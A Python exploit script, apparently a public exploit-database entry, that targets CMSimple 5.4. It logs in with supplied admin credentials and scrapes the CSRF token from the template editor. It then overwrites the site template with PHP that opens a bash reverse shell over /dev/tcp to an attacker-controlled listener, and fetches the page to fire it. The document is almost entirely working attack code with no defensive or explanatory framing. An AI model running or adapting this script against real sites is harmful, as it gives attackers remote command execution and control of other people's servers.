# Date: 29.09.2021
# Exploit Author: pussycat0x
# Vendor Homepage: https://www.cmsimple.org/
# Version: 5.4
# Tested on: ubuntu-20.04.1
import argparse
from bs4 import BeautifulSoup
from argparse import ArgumentParser
import requests
parser= ArgumentParser(description="cmsimple ",
epilog='cmsimpleRCE.py -url targetdomai.com -u username -p password
-ip lhost -lp lport')
rparser = parser.add_argument_group('required argument')
rparser.add_argument('-url','--host', type=str, help='target
domain',required=True)
rparser.add_argument('-u' ,'--username', type=str, help='',
required=True)
rparser.add_argument('-p','--password',type=str,help='',
required=True)
rparser.add_argument('-ip','--lhost',type=str,help='listener ip',
required=True)
rparser.add_argument('-lp','--lport', type=str,help='listener
port', required=True)
args= parser.parse_args()
#url ='192.168.1.106'
s = requests.Session()
def main():
try:
url =(args.host)
payload = {
'user':args.username,
'passwd':args.password,
'submit': 'Login',
'login':'true',
}
login=s.post(url +'/?Welcome_to_CMSimple_5',data=payload)
if login.status_code == 200:
print('Exploit Completed')
else:
print("Invalid Credential")
cook =(login.cookies.get_dict())
temp = s.get(url +'/?file=template&action=edit',
cookies=cook)
soup = BeautifulSoup(temp.text, 'lxml')
csrfToken = soup.find('input',attrs =
{'name':'csrf_token'})['value']
#<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/10.0.0.10/1234
0>&1'");
rev = """<?php exec("/bin/bash -c 'bash -i >&
/dev/tcp/"""
rev2=(args.lhost)
rev3=(args.lport)
rev4=""" 0>&1'");"""
php =(rev+rev2+'/'+rev3+rev4)
revpayload = {
'cmsimpleDataFileStored':'cmsimpleDataFileStored',
'csrf_token':csrfToken,
'text':php,
'file':'template',
'action':'save',
}
shell = s.post(url +'/',cookies=cook , data=revpayload)
exec = s.get(url+'/')
exit()
except:
pass
main()
